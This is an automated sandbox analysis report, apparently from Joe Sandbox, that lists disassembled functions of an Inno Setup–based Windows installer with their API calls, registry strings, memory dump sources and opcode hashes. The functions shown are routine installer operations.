                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID: RegisteredOrganization$RegisteredOwner
                                                              • API String ID: 3535843008-1113070880
                                                              • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                              • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                              • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                              • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                              Function 0047524C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                              • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateErrorFileHandleLast
                                                              • String ID: CreateFile
                                                              • API String ID: 2528220319-823142352
                                                              • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                              • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                              • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                              • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                              Function 0042DE1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID: System\CurrentControlSet\Control\Windows$;H
                                                              • API String ID: 71445658-2565060666
                                                              • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                              • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                              • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                              • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                              Function 004570B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                              • String ID: SHCreateItemFromParsingName$shell32.dll
                                                              • API String ID: 2906209438-2320870614
                                                              • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                              • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                              • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                              • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                              Function 0046CDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                              • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorLibraryLoadModeProc
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2492108670-2683653824
                                                              • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                              • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                              • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                              • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                              Function 0044852C Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID:
                                                              • API String ID: 2574300362-0
                                                              • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                              • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                              • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                              • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                              Function 00481C7C Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Menu$Append$System
                                                              • String ID:
                                                              • API String ID: 1489644407-0
                                                              • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                              • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                              • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                              • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                              Function 004243FC Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                              • TranslateMessage.USER32(?), ref: 0042448F
                                                              • DispatchMessageA.USER32(?), ref: 00424499
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Message$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 4217535847-0
                                                              • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                              • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                              • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                              • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                              Function 00416644 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                              • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Prop$Window
                                                              • String ID:
                                                              • API String ID: 3363284559-0
                                                              • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                              • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                              • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                              • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                              Function 0041EE54 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0041EE64
                                                              • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                              • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$EnableEnabledVisible
                                                              • String ID:
                                                              • API String ID: 3234591441-0
                                                              • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                              • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                              • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                              • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                              Function 00469F1C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 232COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 0046A02D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: PrepareToInstall
                                                              • API String ID: 2558294473-1101760603
                                                              • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                              • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                              • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                              • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                              Function 0046C4BC Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: /:*?"<>|
                                                              • API String ID: 0-4078764451
                                                              • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                              • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                              • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                              • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                              Function 004825C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetActiveWindow.USER32(?), ref: 00482676
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ActiveWindow
                                                              • String ID: InitializeWizard
                                                              • API String ID: 2558294473-2356795471
                                                              • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                              • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                              • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                              • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                              Function 0047C4F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion
                                                              • API String ID: 47109696-1019749484
                                                              • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                              • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                              • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                              • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                              Function 0046EE44 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                              Strings
                                                              • Inno Setup: Setup Version, xrefs: 0046EE65
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: Inno Setup: Setup Version
                                                              • API String ID: 3702945584-4166306022
                                                              • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                              • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                              • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                              • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                              Function 0046EEB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: NoModify
                                                              • API String ID: 3702945584-1699962838
                                                              • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                              • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                              • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                              • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                              Function 0047E474 Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                              • SendNotifyMessageA.USER32(00010452,00000496,00002711,-00000001), ref: 0047E6BA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
